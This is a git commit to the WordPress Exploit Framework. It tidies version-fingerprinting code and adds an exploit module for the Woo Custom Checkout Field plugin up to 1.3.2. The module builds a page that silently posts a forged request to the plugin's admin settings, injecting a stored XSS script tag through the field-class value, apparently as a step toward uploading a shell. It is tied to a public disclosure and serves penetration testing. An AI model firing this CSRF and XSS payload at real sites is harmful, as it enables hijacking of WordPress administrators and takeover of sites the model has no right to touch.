Merged development into master

rastating · rastating · commit 151eb7c09e18 · 2016-07-26T00:04:24.000+01:00
diff --git a/lib/wpxf/wordpress/fingerprint.rb b/lib/wpxf/wordpress/fingerprint.rb
@@ -197,12 +197,23 @@ def content_directory_name(type)
     when :theme
       return 'themes'
     else
-      fail("Unknown readme type #{type}")
+      raise("Unknown readme type #{type}")
     end
   end
 
+  def extract_highest_version(body, pattern)
+    version = nil
+
+    body.scan(pattern) do |match|
+      match_version = Gem::Version.new(match[0])
+      version = match_version if version.nil? || match_version > version
+    end
+
+    version
+  end
+
   def extract_and_check_version(body, pattern, fixed = nil, introduced = nil)
-    version = body[pattern, 1]
+    version = extract_highest_version(body, pattern)
     return :unknown if version.nil?
 
     version = Gem::Version.new(version)
@@ -224,7 +235,7 @@ def extension_version_pattern(type)
       # Version: 1.5.2
       return /(?:Version):\s*([0-9a-z.-]+)/i
     else
-      fail("Unknown file type #{type}")
+      raise("Unknown file type #{type}")
     end
   end
 end
diff --git a/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb b/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb
@@ -0,0 +1,41 @@
+class Wpxf::Exploit::WooCustomCheckoutFieldXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Woo Custom Checkout Field <= 1.3.2 XSS Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+      ],
+      references: [
+        ['URL', 'http://blog.rastating.com/woo-custom-checkout-field-1-3-2-csrf-stored-xss-disclosure']
+      ],
+      date: 'Jul 23 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('woo-custom-checkout-field', 'readme.txt', '1.3.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}?page=ccf_settings_menu', {
+        txt_field_name: '#{Utility::Text.rand_alpha(5)}',
+        txt_field_class: '<script>#{xss_include_script}<\\/script>',
+        txt_field_placeholder: '#{Utility::Text.rand_alpha(5)}',
+        txt_field_type: 'text',
+        txt_field_options: '',
+        add_field: ''
+      });
+    </script></body></html>
+    |
+  end
+end
